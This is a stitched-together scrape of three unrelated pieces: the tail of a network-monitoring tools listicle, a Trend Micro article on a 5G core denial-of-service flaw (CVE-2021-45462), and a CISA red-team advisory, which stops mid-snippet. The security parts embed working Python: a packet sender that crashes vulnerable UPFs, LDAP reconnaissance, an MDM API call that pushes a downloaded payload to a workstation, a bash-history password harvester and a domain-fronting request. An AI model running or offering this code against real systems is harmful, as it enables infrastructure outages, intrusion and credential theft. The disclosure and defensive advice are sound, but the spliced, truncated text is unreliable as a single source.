Atera charges for its platform per technician, so it is very affordable for MSPs of all sizes. This extends to sole technicians operating on a contract basis and possibly fielding many small business clients.

PROS:

  • Remote automated network discovery
  • Network performance monitoring with SNMP
  • Alerts for notified device problems
  • Also includes remote system management tools
  • Scalable pricing with three plan levels
  • 30-day free trial

CONS:

  • Network mapping costs extra

You can start a 30-day free trial.


10. ManageEngine RMM Central – FREE TRIAL

ManageEngine RMM Central

ManageEngine RMM Central provides sysadmins with everything they need to support their network. Automated asset discovery makes deployment simple, allowing you to discover and inventory all of the devices on your network by the end of the day.

Key Features

  • Automated network monitoring and asset discovery
  • Built-in remote access with various troubleshooting tools
  • Flexible alert integrations

With network and asset metrics collected, administrators can quickly see critical insights automatically generated by the platform. With over 100 automated reports it’s easy to see exactly where your bottlenecks are and what endpoints are having trouble.

Administrators can configure their own SLAs with various automated alert options and can even pair those alerts with other automations that integrate into their helpdesk workflow.

PROS:

  • Uses a combination of packet sniffing, WMI, and SNMP to report network performance data
  • Fully customizable dashboard is great for both lone administrators as well as NOC teams
  • Drag and drop editor makes it easy to build custom views and reports
  • Supports a wide range of alert mediums such as SMS, email, and third-party integrations into platforms like Slack

CONS:

  • Is a very comprehensive platform with many features and moving parts that require time to learn

Start a 30-day free trial.

Source:
https://www.pcwdld.com/network-monitoring-tools-software/

Attacks on 5G Infrastructure From Users’ Devices

By: Salim S.I.
September 20, 2023
Read time: 8 min (2105 words)

Crafted packets from cellular devices such as mobile phones can exploit faulty state machines in the 5G core to attack cellular infrastructure. Smart devices that critical industries such as defense, utilities, and the medical sectors use for their daily operations depend on the speed, efficiency, and productivity brought by 5G. This entry describes CVE-2021-45462 as a potential use case to deploy a denial-of-service (DoS) attack to private 5G networks.

5G unlocks unprecedented applications previously unreachable with conventional wireless connectivity to help enterprises accelerate digital transformation, reduce operational costs, and maximize productivity for the best return on investments. To achieve its goals, 5G relies on key service categories: massive machine-type communications (mMTC), enhanced mobile broadband (eMBB), and ultra-reliable low-latency communication (uRLLC).

With the growing spectrum for commercial use, usage and popularization of private 5G networks are on the rise. The manufacturing, defense, ports, energy, logistics, and mining industries are just some of the earliest adopters of these private networks, especially for companies rapidly leaning on the internet of things (IoT) for digitizing production systems and supply chains. Unlike public grids, the cellular infrastructure equipment in private 5G might be owned and operated by the user-enterprise themselves, system integrators, or by carriers. However, given the growing study and exploration of the use of 5G for the development of various technologies, cybercriminals are also looking into exploiting the threats and risks that can be used to intrude into the systems and networks of both users and organizations via this new communication standard. This entry explores how normal user devices can be abused in relation to 5G’s network infrastructure and use cases.

5G topology

In an end-to-end 5G cellular system, user equipment (aka UE, such as mobile phones and internet-of-things [IoT] devices), connect to a base station via radio waves. The base station is connected to the 5G core through a wired IP network.

Functionally, the 5G core can be split into two: the control plane and the user plane. In the network, the control plane carries the signals and facilitates the traffic based on how it is exchanged from one endpoint to another. Meanwhile, the user plane functions to connect and process the user data that comes over the radio area network (RAN).

The base station sends control signals related to device attachment and establishes the connection to the control plane via NGAP (Next-Generation Application Protocol). The user traffic from devices is sent to the user plane using GTP-U (GPRS tunneling protocol user plane). From the user plane, the data traffic is routed to the external network. 

Figure 1. The basic 5G network infrastructure

The UE subnet and infrastructure network are separate and isolated from each other; user equipment is not allowed to access infrastructure components. This isolation helps protect the 5G core from CT (Cellular Technology) protocol attacks generated from users’ equipment.

Is there a way to get past this isolation and attack the 5G core? The next sections elaborate on how cybercriminals could abuse components of the 5G infrastructure, particularly the GTP-U.

GTP-U

GTP-U is a tunneling protocol that exists between the base station and 5G user plane using port 2152. The following is the structure of a user data packet encapsulated in GTP-U.

Figure 2. GTP-U data packet

A GTP-U tunnel packet is created by attaching a header to the original data packet. The added header consists of a UDP (User Datagram Protocol) transport header plus a GTP-U-specific header. The GTP-U header consists of the following fields (a byte-level sketch follows the list):

  • Flags: This contains the version and other information (such as an indication of whether optional header fields are present, among others).
  • Message type: For GTP-U packet carrying user data, the message type is 0xFF.
  • Length: This is the length in bytes of everything that comes after the Tunnel Endpoint Identifier (TEID) field.
  • TEID: Unique value for a tunnel that maps the tunnel to user devices
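For illustration, the mandatory part of this header can be packed in a few lines of Python. This is a minimal sketch of the field layout described above, not code from any base station or UPF implementation; the example TEID and payload are made up.

    import struct

    def gtpu_encapsulate(teid: int, inner_packet: bytes, msg_type: int = 0xFF) -> bytes:
        """Prepend the 8-byte mandatory GTP-U header (version 1, no optional fields)."""
        flags = 0x30                 # version=1, PT=1 (GTP), optional-field bits clear
        length = len(inner_packet)   # length counts everything after the TEID field
        return struct.pack("!BBHI", flags, msg_type, length, teid) + inner_packet

    # A 36-byte inner packet yields length=36; message type 0xFF marks user data (T-PDU).
    tunneled = gtpu_encapsulate(teid=0x1234, inner_packet=b"\x45" + b"\x00" * 35)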

The GTP-U header is added by the GTP-U nodes (the base station and User Plane Function or UPF). However, the user cannot see the header on the user interface of the device. Therefore, user devices cannot manipulate the header fields.

Although GTP-U is a standard tunneling technique, its use is mostly restricted to CT environments between the base station and the UPF or between UPFs. Assuming the best scenario, the backhaul between the base station and the UPF is encrypted, protected by a firewall, and closed to outside access. Here is a breakdown of the ideal scenario: GSMA recommends IP security (IPsec) between the base station and the UPF. In such a scenario, packets going to the GTP-U nodes come from authorized devices only. If these devices follow specifications and implement them well, none of them will send anomalous packets. Besides, robust systems are expected to have strong sanity checks to handle received anomalies, especially obvious ones such as invalid lengths, types, and extensions, among others.

In reality, however, the scenario is often different and requires a different analysis altogether. Operators are reluctant to deploy IPsec on the N3 interface because it is CPU-intensive and reduces the throughput of user traffic. Also, since the user data is perceived to be protected at the application layer (with additional protocols such as TLS, or Transport Layer Security), some consider IP security redundant. One might think that as long as the base station and packet core conform to the specification, there will be no anomalies, and that all robust systems have sanity checks to catch any obvious anomalies. However, previous studies have shown that many N3 nodes (such as the UPF) around the world, although they should not be, are exposed to the internet. This is shown in the following sections.


Figure 3. Exposed UPF interfaces due to misconfigurations or lack of firewalls; screenshot taken from Shodan and used in a previously published research

We discuss two concepts that can exploit the GTP-U using CVE-2021-45462. In Open5GS, a C-language open-source implementation of the 5G core and Evolved Packet Core (EPC), sending a zero-length, type=255 GTP-U packet from the user device resulted in a denial of service (DoS) of the UPF. This is CVE-2021-45462, a security gap in the packet core that allows the UPF (in 5G) or the Serving Gateway User Plane Function (SGW-U in 4G/LTE) to be crashed by an anomalous GTP-U packet that is crafted from the UE and tunneled inside legitimate GTP-U traffic. Given that the exploit affects a critical component of the infrastructure and cannot be resolved easily, the vulnerability has received a Medium to High severity rating.
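To make the attack vector concrete, here is a rough sketch of how such a packet could be produced from the UE side. The UPF address is hypothetical, and this must only ever be run in an isolated lab against software you are authorized to test.

    import socket
    import struct

    UPF_IP = "10.45.0.1"   # hypothetical user-plane (N3) address as routed from the UE
    GTPU_PORT = 2152       # registered GTP-U port

    # GTP-U header with message type 0xFF but length 0: the anomalous shape
    # reported to crash vulnerable Open5GS UPF builds (CVE-2021-45462).
    anomalous = struct.pack("!BBHI", 0x30, 0xFF, 0, 0)

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(anomalous, (UPF_IP, GTPU_PORT))
    # The base station wraps this datagram in its own, well-formed GTP-U tunnel,
    # producing the GTP-U-in-GTP-U condition when it reaches the UPF.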

GTP-U nodes: Base station and UPF

GTP-U nodes are endpoints that encapsulate and decapsulate GTP-U packets. The base station is the GTP-U node on the user device side. As the base station receives user data from the UE, it converts the data to IP packets and encapsulates it in the GTP-U tunnel.

The UPF is the GTP-U node on the 5G core (5GC) side. When it receives a GTP-U packet from the base station, the UPF decapsulates the outer GTP-U header and takes out the inner packet. The UPF looks up the destination IP address in a routing table (also maintained by the UPF) without checking the content of the inner packet, after which the packet is sent on its way.

GTP-U in GTP-U

What if a user device crafts an anomalous GTP-U packet and sends it to a packet core?

Figure 4. A specially crafted anomalous GTP-U packet
Figure 5. Sending an anomalous GTP-U packet from the user device

As intended, the base station will tunnel this packet inside its GTP-U tunnel and send it to the UPF. This results in a GTP-U-in-GTP-U packet arriving at the UPF. There are now two GTP-U headers in the packet: the outer GTP-U header is created by the base station to encapsulate the data packet from the user device. This outer GTP-U packet has 0xFF as its message type and a length of 44; this header is normal. The inner GTP-U header is crafted and sent by the user device as a data packet. Like the outer one, this inner GTP-U header has 0xFF as its message type, but its length of 0 is not normal.

The source IP address of the inner packet belongs to the user device, while the source IP address of the outer packet belongs to the base station. Both inner and outer packets have the same destination IP address: that of the UPF.

The UPF decapsulates the outer GTP-U and passes the functional checks. The inner GTP-U packet’s destination is again the same UPF. What happens next is implementation-specific:

  • Some implementations maintain a state machine for packet traversal. Improper implementation of the state machine might result in processing this inner GTP-U packet. This packet might have passed the checks phase already since it shares the same packet-context with the outer packet. This leads to having an anomalous packet inside the system, past sanity checks.
  • Since the inner packet’s destination is the IP address of UPF itself, the packet might get sent to the UPF. In this case, the packet is likely to hit the functional checks and therefore becomes less problematic than the previous case.

Attack vector

Some 5G core vendors leverage Open5GS code. For example, NextEPC (a 4G system that was rebranded as Open5GS in 2019 when 5G support was added, with some products remaining under the old brand) has an enterprise offer for LTE/5G that draws from Open5GS' code. No attacks or indications of threats in the wild have been observed, but our tests indicate potential risks under the identified scenarios.

The importance of the attack is in the attack vector: cellular infrastructure attacks launched from the UE. The exploit only requires a mobile phone (or a computer connected via a cellular dongle) and a few lines of Python code to abuse the opening and mount this class of attack. GTP-U-in-GTP-U is a well-known attack technique, and backhaul IP security and encryption do not prevent it. In fact, these security measures might hinder the firewall from inspecting the content.

Remediation and insights

Critical industries such as the medical and utility sectors are among the early adopters of private 5G systems, and the breadth and depth of its use are only expected to grow further. Reliability for continuous, uninterrupted operations is critical for these industries, as lives and real-world consequences are at stake. These foundational requirements are the reason these sectors choose a private 5G system over Wi-Fi. It is imperative that private 5G systems offer unfailing connectivity, as a successful attack on any 5G infrastructure could bring the entire network down.

In this entry, we described how the abuse of CVE-2021-45462 can result in a DoS attack. The root cause of CVE-2021-45462 (and of most GTP-U-in-GTP-U attacks) is improper error checking and error handling in the packet core. While GTP-U-in-GTP-U itself is harmless, the proper fix for the gap has to come from the packet-core vendor, and infrastructure admins must use the latest versions of the software.

A GTP-U-in-GTP-U attack can also be used to leak sensitive information such as the IP addresses of infrastructure nodes. GTP-U peers should therefore be prepared to handle GTP-U-in-GTP-U packets. In CT environments, they should use an intrusion prevention system (IPS) or firewalls that can understand CT protocols. Since GTP-U is not normal user traffic, especially in private 5G, security teams can prioritize and drop GTP-U-in-GTP-U traffic.
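As a sketch of what prioritizing and dropping GTP-U-in-GTP-U traffic can look like, the heuristic below inspects the inner IP packet after outer decapsulation and flags user traffic addressed to the GTP-U port. It illustrates the idea only; it is not a feature of any particular IPS or firewall.

    import struct

    GTPU_PORT = 2152

    def is_gtpu_in_gtpu(inner_ip_packet: bytes) -> bool:
        """Flag decapsulated user traffic that itself targets the GTP-U port."""
        if len(inner_ip_packet) < 28:            # minimal IPv4 (20) + UDP (8)
            return False
        if inner_ip_packet[0] >> 4 != 4:         # IPv4 only in this sketch
            return False
        ihl = (inner_ip_packet[0] & 0x0F) * 4    # IPv4 header length in bytes
        if inner_ip_packet[9] != 17:             # protocol 17 = UDP
            return False
        dport = struct.unpack("!H", inner_ip_packet[ihl + 2 : ihl + 4])[0]
        return dport == GTPU_PORT                # user traffic to 2152 is suspect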

As a general rule, the registration and use of SIM cards must be strictly regulated and managed. An attacker with a stolen SIM card could insert it into their own device to connect to a network for malicious deployments. Moreover, the responsibility for security might be ambiguous in a shared operating model: the end devices and the edge of the infrastructure chain might be owned by the enterprise, while the cellular infrastructure is owned by the integrator or carrier. This makes it hard for security operations centers (SOCs) to bring relevant information together from different domains and solutions.

In addition, due to the downtime and tests required, regularly updating critical infrastructure software to keep up with vendors' patches is not easy, nor will it ever be. Virtual patching with an IPS or layered firewalls is thus strongly recommended. Fortunately, GTP-U-in-GTP-U is rarely used in real-world applications, so it might be safe to completely block all GTP-U-in-GTP-U traffic. We recommend using layered security solutions that combine IT and communications technology (CT) security and visibility. Implementing zero-trust solutions, such as Trend Micro™ Mobile Network Security, powered by CTOne, adds another security layer for enterprises and critical industries by preventing the unauthorized use of their private networks and ensuring that each SIM is used only from an authorized device, supporting a continuous and undisrupted industrial ecosystem. Mobile Network Security also brings CT and IT security into a unified visibility and management console.

Source:
https://www.trendmicro.com/it_it/research/23/i/attacks-on-5g-infrastructure-from-users-devices.html

CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks

Release Date: February 28, 2023
Alert Code: AA23-059A

SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory (CSA) detailing activity and key findings from a recent CISA red team assessment, conducted in coordination with the assessed organization, to provide network defenders with recommendations for improving their organization's cyber posture.

Actions to take today to harden your local environment:

  • Establish a security baseline of normal network activity; tune network and host-based appliances to detect anomalous behavior.
  • Conduct regular assessments to ensure appropriate procedures are created and can be followed by security staff and end users.
  • Enforce phishing-resistant MFA to the greatest extent possible.

In 2022, CISA conducted a red team assessment (RTA) at the request of a large critical infrastructure organization with multiple geographically separated sites. The team gained persistent access to the organization's network, moved laterally across the organization's multiple geographically separated sites, and eventually gained access to systems adjacent to the organization's sensitive business systems (SBSs). Multifactor authentication (MFA) prompts prevented the team from achieving access to one SBS, and the team was unable to complete its viable plan to compromise a second SBS within the assessment period.

Despite having a mature cyber posture, the organization did not detect the red team’s activity throughout the assessment, including when the team attempted to trigger a security response.

CISA is releasing this CSA detailing the red team’s tactics, techniques, and procedures (TTPs) and key findings to provide network defenders of critical infrastructure organizations proactive steps to reduce the threat of similar activity from malicious cyber actors. This CSA highlights the importance of collecting and monitoring logs for unusual activity as well as continuous testing and exercises to ensure your organization’s environment is not vulnerable to compromise, regardless of the maturity of its cyber posture.

CISA encourages critical infrastructure organizations to apply the recommendations in the Mitigations section of this CSA—including conducting regular testing within their security operations center—to ensure security processes and procedures are up to date, effective, and enable timely detection and mitigation of malicious activity.

Download the PDF version of this report:

CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks (PDF, 1.06 MB)

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the appendix for a table of the red team’s activity mapped to MITRE ATT&CK tactics and techniques.

Introduction

CISA has authority to, upon request, provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and provide operational and timely technical assistance to Federal and non-Federal entities with respect to cybersecurity risks. (See generally 6 U.S.C. §§ 652[c][5], 659[c][6].) After receiving a request for a red team assessment (RTA) from an organization and coordinating some high-level details of the engagement with certain personnel at the organization, CISA conducted the RTA over a three-month period in 2022.

During RTAs, a CISA red team emulates cyber threat actors to assess an organization’s cyber detection and response capabilities. During Phase I, the red team attempts to gain and maintain persistent access to an organization’s enterprise network while avoiding detection and evading defenses. During Phase II, the red team attempts to trigger a security response from the organization’s people, processes, or technology.

The “victim” for this assessment was a large organization with multiple geographically separated sites throughout the United States. For this assessment, the red team’s goal during Phase I was to gain access to certain sensitive business systems (SBSs).

Phase I: Red Team Cyber Threat Activity
Overview

The organization’s network was segmented with both logical and geographical boundaries. CISA’s red team gained initial access to two organization workstations at separate sites via spearphishing emails. After gaining access and leveraging Active Directory (AD) data, the team gained persistent access to a third host via spearphishing emails. From that host, the team moved laterally to a misconfigured server, from which they compromised the domain controller (DC). They then used forged credentials to move to multiple hosts across different sites in the environment and eventually gained root access to all workstations connected to the organization’s mobile device management (MDM) server. The team used this root access to move laterally to SBS-connected workstations. However, a multifactor authentication (MFA) prompt prevented the team from achieving access to one SBS, and Phase I ended before the team could implement a seemingly viable plan to achieve access to a second SBS.

Initial Access and Active Directory Discovery

The CISA red team gained initial access [TA0001] to two workstations at geographically separated sites (Site 1 and Site 2) via spearphishing emails. The team first conducted open-source research [TA0043] to identify potential targets for spearphishing. Specifically, the team looked for email addresses [T1589.002] as well as names [T1589.003] that could be used to derive email addresses based on the team’s identification of the email naming scheme. The red team sent tailored spearphishing emails to seven targets using commercially available email platforms [T1585.002]. The team used the logging and tracking features of one of the platforms to analyze the organization’s email filtering defenses and confirm the emails had reached the target’s inbox.
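As an illustration of deriving addresses from a naming scheme, the snippet below generates candidate emails once the pattern (here, assumed to be first initial plus last name) has been identified. The names, pattern, and domain are hypothetical.

    # Hypothetical naming scheme inferred during reconnaissance: first initial + last name.
    def derive_email(first: str, last: str, domain: str = "example.org") -> str:
        return f"{first[0]}{last}".lower() + "@" + domain

    targets = [("Avery", "Smith"), ("Jordan", "Lee")]
    print([derive_email(f, l) for f, l in targets])
    # ['asmith@example.org', 'jlee@example.org']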

The team built a rapport with some targeted individuals through emails, eventually leading these individuals to accept a virtual meeting invite. The meeting invite took them to a red team-controlled domain [T1566.002] with a button, which, when clicked, downloaded a “malicious” ISO file [T1204]. After the download, another button appeared, which, when clicked, executed the file.

Two of the seven targets responded to the phishing attempt, giving the red team access to a workstation at Site 1 (Workstation 1) and a workstation at Site 2. On Workstation 1, the team leveraged a modified SharpHound collector, ldapsearch, and the command-line tool dsquery to query and scrape AD information, including AD users [T1087.002], computers [T1018], groups [T1069.002], access control lists (ACLs), organizational units (OUs), and group policy objects (GPOs) [T1615]. Note: SharpHound is a collector for BloodHound, an open-source AD reconnaissance tool; BloodHound has multiple collectors that assist with information querying.

There were 52 hosts in the AD that had Unconstrained Delegation enabled and a lastlogon timestamp within 30 days of the query. Hosts with Unconstrained Delegation enabled store Kerberos ticket-granting tickets (TGTs) of all users that have authenticated to that host. Many of these hosts, including a Site 1 SharePoint server, were Windows Server 2012R2. The default configuration of Windows Server 2012R2 allows unprivileged users to query group membership of local administrator groups.

The red team queried the parsed BloodHound data for members of the SharePoint admin group and identified several standard user accounts with administrative access. The team initiated a second spearphishing campaign, similar to the first, to target these users. One user triggered the red team's payload, which led to the installation of a persistent beacon on the user's workstation (Workstation 2), giving the team persistent access to Workstation 2.

Lateral Movement, Credential Access, and Persistence

The red team moved laterally [TA0008] from Workstation 2 to the Site 1 SharePoint server, obtaining SYSTEM-level access to the server, which had Unconstrained Delegation enabled. They used this access to obtain the cached credentials of all logged-in users—including the New Technology LAN Manager (NTLM) hash for the SharePoint server account. To obtain the credentials, the team took a snapshot of lsass.exe [T1003.001] with a tool called nanodump, exported the output, and processed the output offline with Mimikatz.

The team then exploited the Unconstrained Delegation misconfiguration to steal the DC’s TGT. They ran the DFSCoerce python script (DFSCoerce.py), which prompted DC authentication to the SharePoint server using the server’s NTLM hash. The team then deployed Rubeus to capture the incoming DC TGT [T1550.002], [T1557.001]. (DFSCoerce abuses Microsoft’s Distributed File System [MS-DFSNM] protocol to relay authentication against an arbitrary server.[1])

The team then used the TGT to harvest advanced encryption standard (AES)-256 hashes via DCSync [T1003.006] for the krbtgt account and several privileged accounts—including domain admins, workstation admins, and a system center configuration management (SCCM) service account (SCCM Account 1). The team used the krbtgt account hash throughout the rest of their assessment to perform golden ticket attacks [T1558.001] in which they forged legitimate TGTs. The team also used the asktgt command to impersonate accounts they had credentials for by requesting account TGTs [T1550.003].

The team first impersonated the SCCM Account 1 and moved laterally to a Site 1 SCCM distribution point (DP) server (SCCM Server 1) that had direct network access to Workstation 2. The team then moved from SCCM Server 1 to a central SCCM server (SCCM Server 2) at a third site (Site 3). Specifically, the team:

  1. Queried the AD using the Lightweight Directory Access Protocol (LDAP) for information about the network's sites and subnets [T1016] (see the sketch after this list). This query revealed all organization sites and subnets, broken down by classless inter-domain routing (CIDR) subnet and description.
  2. Used LDAP queries and domain name system (DNS) requests to identify recently active hosts.
  3. Listed existing network connections [T1049] on SCCM Server 1, which revealed an active Server Message Block (SMB) connection from SCCM Server 2.
  4. Attempted to move laterally to the SCCM Server 2 via AppDomain hijacking, but the HTTPS beacon failed to call back.
  5. Attempted to move laterally with an SMB beacon [T1021.002], which was successful.
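The subnet query in step 1 can be illustrated with the ldap3 library. The domain name, credentials, and naming context below are hypothetical placeholders; AD stores site and subnet definitions under the Configuration naming context.

    from ldap3 import ALL, NTLM, Connection, Server

    server = Server("dc01.corp.example", get_info=ALL)
    conn = Connection(
        server,
        user="CORP\\someuser",       # hypothetical low-privilege domain account
        password="changeme",
        authentication=NTLM,
        auto_bind=True,
    )

    # Subnet objects live under CN=Subnets,CN=Sites in the Configuration partition.
    conn.search(
        search_base="CN=Subnets,CN=Sites,CN=Configuration,DC=corp,DC=example",
        search_filter="(objectClass=subnet)",
        attributes=["cn", "siteObject", "description"],
    )
    for entry in conn.entries:
        print(entry.cn, entry.siteObject, entry.description)  # CIDR, owning site, notes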

The team also moved from SCCM Server 1 to a Site 1 workstation (Workstation 3) used by an active server administrator. The team impersonated an administrative service account via a golden ticket attack (from SCCM Server 1); the account had administrative privileges on Workstation 3. The administrator used a KeePass password manager, which stored credentials in a database file. The red team pulled the decryption key from memory using KeeThief and used it to unlock the database [T1555.005], obtaining passwords for internal websites, a kernel-based virtual machine (KVM) server, virtual private network (VPN) endpoints, firewalls, and another KeePass database.

At the organization’s request, the red team confirmed that SCCM Server 2 provided access to the organization’s sites because firewall rules allowed SMB traffic to SCCM servers at all other sites.

The team moved laterally from SCCM Server 2 to an SCCM DP server at Site 5 and from the SCCM Server 1 to hosts at two other sites (Sites 4 and 6). The team installed persistent beacons at each of these sites. Site 5 was broken into a private and a public subnet and only DCs were able to cross that boundary. To move between the subnets, the team moved through DCs. Specifically, the team moved from the Site 5 SCCM DP server to a public DC; and then they moved from the public DC to the private DC. The team was then able to move from the private DC to workstations in the private subnet.

The team leveraged access available from SCCM Server 2 to move around the organization's network for post-exploitation activities (see the Post-Exploitation Activity section).

See Figure 1 for a timeline of the red team’s initial access and lateral movement showing key access points.

Figure 1: Red Team Cyber Threat Activity: Initial Access and Lateral Movement

While traversing the network, the team varied their lateral movement techniques to evade detection and because the organization had non-uniform firewalls between the sites and within the sites (within the sites, firewalls were configured by subnet). The team’s primary methods to move between sites were AppDomainManager hijacking and dynamic-link library (DLL) hijacking [T1574.001]. In some instances, they used Windows Management Instrumentation (WMI) Event Subscriptions [T1546.003].

The team impersonated several accounts to evade detection while moving. When possible, the team remotely enumerated the local administrators group on target hosts to find a valid user account. This technique relies on anonymous SMB pipe binds [T1071], which are disabled by default starting with Windows Server 2016. In other cases, the team attempted to determine valid accounts based on group name and purpose. If the team had previously acquired the credentials, they used asktgt to impersonate the account. If the team did not have the credentials, they used the golden ticket attack to forge the account.

Post-Exploitation Activity: Gaining Access to SBSs

With persistent, deep access established across the organization’s networks and subnetworks, the red team began post-exploitation activities and attempted to access SBSs. Trusted agents of the organization tasked the team with gaining access to two specialized servers (SBS 1 and SBS 2). The team achieved root access to three SBS-adjacent workstations but was unable to move laterally to the SBS servers:

  • Phase I ended before the team could implement a plan to move to SBS 1.
  • An MFA prompt blocked the team from moving to SBS 2, and Phase I ended before they could implement potential workarounds.

However, the team assesses that by using Secure Shell (SSH) session socket files (see below), they could have accessed any hosts available to the users whose workstations were compromised.

Plan for Potential Access to SBS 1

Conducting open-source research [T1591.001], the team identified that SBS 1 and SBS 2 assets and their associated management and upkeep staff were located at Sites 5 and 6, respectively. Adding previously collected AD data to this discovery, the team was able to identify a specific SBS 1 admin account. The team planned to use the organization's mobile device management (MDM) software to move laterally to the SBS 1 administrator's workstation and, from there, pivot to SBS 1 assets.

The team identified the organization’s MDM vendor using open-source and AD information [T1590.006] and moved laterally to an MDM distribution point server at Site 5 (MDM DP 1). This server contained backups of the MDM MySQL database on its D: drive in the Backup directory. The backups included the encryption key needed to decrypt any encrypted values, such as SSH passwords [T1552]. The database backup identified both the user of the SBS 1 administrator account (USER 2) and the user’s workstation (Workstation 4), which the MDM software remotely administered.

The team moved laterally to an MDM server (MDM 1) at Site 3, searched files on the server, and found plaintext credentials [T1552.001] to an application programming interface (API) user account stored in PowerShell scripts. The team attempted to leverage these credentials to browse to the web login page of the MDM vendor but were unable to do so because the website directed to an organization-controlled single-sign on (SSO) authentication page.

The team gained root access to workstations connected to MDM 1—specifically, the team accessed Workstation 4—by taking the following steps (a hypothetical API sketch follows this list):

  1. Selecting an MDM user from the plaintext credentials in PowerShell scripts on MDM 1.
  2. While in the MDM MySQL database,
    • Elevating the selected MDM user’s account privileges to administrator privileges, and
    • Modifying the user’s account by adding Create Policy and Delete Policy permissions [T1098], [T1548].
  3. Creating a policy via the MDM API [T1106], which instructed Workstation 4 to download and execute a payload to give the team interactive access as root to the workstation.
  4. Verifying their interactive access.
  5. Resetting permissions back to their original state by removing the policy via the MDM API and removing the Create Policy, Delete Policy, and administrator permissions from the MDM user's account.
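The policy-creation step (step 3) and cleanup step (step 5) could look roughly like the following against a REST-style MDM API. The endpoints, payload shape, hostnames, and token are entirely hypothetical; real MDM products each have their own APIs.

    import requests

    BASE = "https://mdm1.corp.example/api/v1"          # hypothetical MDM endpoint
    HEADERS = {"Authorization": "Bearer <elevated-mdm-user-token>"}  # from step 2

    # Step 3: create a policy that pushes and executes a payload on Workstation 4.
    policy = {
        "name": "inventory-refresh",                   # innocuous-looking name
        "target_devices": ["WORKSTATION-4"],
        "action": {"type": "run_script", "url": "https://files.corp.example/payload.sh"},
    }
    resp = requests.post(f"{BASE}/policies", json=policy, headers=HEADERS, timeout=30)
    policy_id = resp.json()["id"]

    # Step 5: remove the policy to restore the original state.
    requests.delete(f"{BASE}/policies/{policy_id}", headers=HEADERS, timeout=30)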

While interacting with Workstation 4, the team found an open SSH socket file and a corresponding netstat connection to a host that the team identified as a bastion host from architecture documentation found on Workstation 4. The team planned to move from Workstation 4 to the bastion host, and from there to SBS 1. Note: An SSH socket file allows a user to open multiple SSH sessions through a single, already-authenticated SSH connection without additional authentication.

The team could not take advantage of the open SSH socket. Instead, they searched through SBS 1 architecture diagrams and documentation on Workstation 4. They found a security operations (SecOps) network diagram detailing the network boundaries between Site 5 SecOps on-premises systems, Site 5 non-SecOps on-premises systems, and Site 5 SecOps cloud infrastructure. The documentation listed the SecOps cloud infrastructure IP ranges [T1580]. These “trusted” IP addresses were a public /16 subnet; the team was able to request a public IP in that range from the same cloud provider, and Workstation 4 made successful outbound SSH connections to this cloud infrastructure. The team intended to use that connection to reverse tunnel traffic back to the workstation and then access the bastion host via the open SSH socket file. However, Phase I ended before they were able to implement this plan.

Attempts to Access SBS 2

Conducting open-source research, the team identified an organizational branch [T1591] that likely had access to SBS 2. The team queried the AD to identify the branch’s users and administrators. The team gathered a list of potential accounts, from which they identified administrators, such as SYSTEMS ADMIN or DATA SYSTEMS ADMINISTRATOR, with technical roles. Using their access to the MDM MySQL database, the team queried potential targets to (1) determine the target’s last contact time with the MDM and (2) ensure any policy targeting the target’s workstation would run relatively quickly [T1596.005]. Using the same methodology as described by the steps in the Plan for Potential Access to SBS 1 section above, the team gained interactive root access to two Site 6 SBS 2-connected workstations: a software engineering workstation (Workstation 5) and a user administrator workstation (Workstation 6).

The Workstation 5 user had bash history files containing what appeared to be SSH passwords mistyped into the bash prompt and saved in the history [T1552.003]. The team then attempted to authenticate to SBS 2 using a tunnel setup similar to the one described in the Plan for Potential Access to SBS 1 section above and the potential credentials from the user's bash history file. However, this attempt was unsuccessful for unknown reasons.
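A crude way to surface such stray secrets is to scan a shell history file for lone tokens that do not look like commands. The pattern and thresholds below are illustrative assumptions, not the red team's actual tooling.

    import re
    from pathlib import Path

    COMMON_COMMANDS = ("cd", "ls", "ssh", "sudo", "cat", "vim", "git", "exit")

    def candidate_secrets(history_path: Path) -> list[str]:
        """Return lone, password-like tokens found on their own history lines."""
        hits = []
        for line in history_path.read_text(errors="ignore").splitlines():
            token = line.strip()
            if " " in token or token.startswith(COMMON_COMMANDS):
                continue  # multi-word lines are commands, not stray passwords
            if 8 <= len(token) <= 64 and re.search(r"\d", token):
                hits.append(token)
        return hits

    print(candidate_secrets(Path.home() / ".bash_history"))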

On Workstation 6, the team found a .txt file containing plaintext credentials for the user. Using the pattern discovered in these credentials, the team was able to crack the user’s workstation account password [T1110.002]. The team also discovered potential passwords and SSH connection commands in the user’s bash history. Using a similar tunnel setup described above, the team attempted to log into SBS 2. However, a prompt for an MFA passcode blocked this attempt.

See Figure 2 for a timeline of the team's post-exploitation activity, including key points of access.

Figure 2: Red Team Cyber Threat Activity: Post Exploitation
Command and Control

The team used third-party owned and operated infrastructure and services [T1583] throughout their assessment, including in certain cases for command and control (C2) [TA0011]. These included:

  • Cobalt Strike and Merlin payloads for C2 throughout the assessment. Note: Merlin is a post-exploit tool that leverages HTTP protocols for C2 traffic.
    • The team maintained multiple Cobalt Strike servers hosted by a cloud vendor. They configured each server with a different domain and used the servers for communication with compromised hosts. These servers retained all assessment data.
  • Two commercially available cloud-computing platforms.
    • The team used these platforms to create flexible and dynamic redirect servers to send traffic to the team's Cobalt Strike servers [T1090.002]. Redirecting servers make it difficult for defenders to attribute assessment activities to the backend team servers. The redirectors used HTTPS reverse proxies to redirect C2 traffic between the target organization's network and the Cobalt Strike team servers [T1071.002]. The team encrypted all data in transit [T1573] using encryption keys stored on the team's Cobalt Strike servers.
  • A cloud service to rapidly change the IP address of the team’s redirecting servers in the event of detection and eradication.
  • Content delivery network (CDN) services to further obfuscate some of the team’s C2 traffic.
    • This technique leverages CDNs associated with high-reputation domains so that the malicious traffic appears to be directed towards a high-reputation domain but is actually redirected to the red team-controlled Cobalt Strike servers.
    • The team used domain fronting [T1090.004] to disguise outbound traffic in order to diversify the domains with which the persistent beacons were communicating. This technique, which also leverages CDNs, allows the beacon to appear to connect to third-party domains, such as nytimes.com, when it is actually connecting to the team’s redirect server.
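In essence, domain fronting exploits the gap between the domain presented to the network (in TLS/SNI) and the Host header the CDN routes on. The snippet below is a schematic illustration with made-up hostnames; many CDNs now reject such mismatches.

    import requests

    # The TLS connection (and SNI) goes to a high-reputation CDN-hosted domain,
    # while the HTTP Host header names the CDN-backed redirector the request
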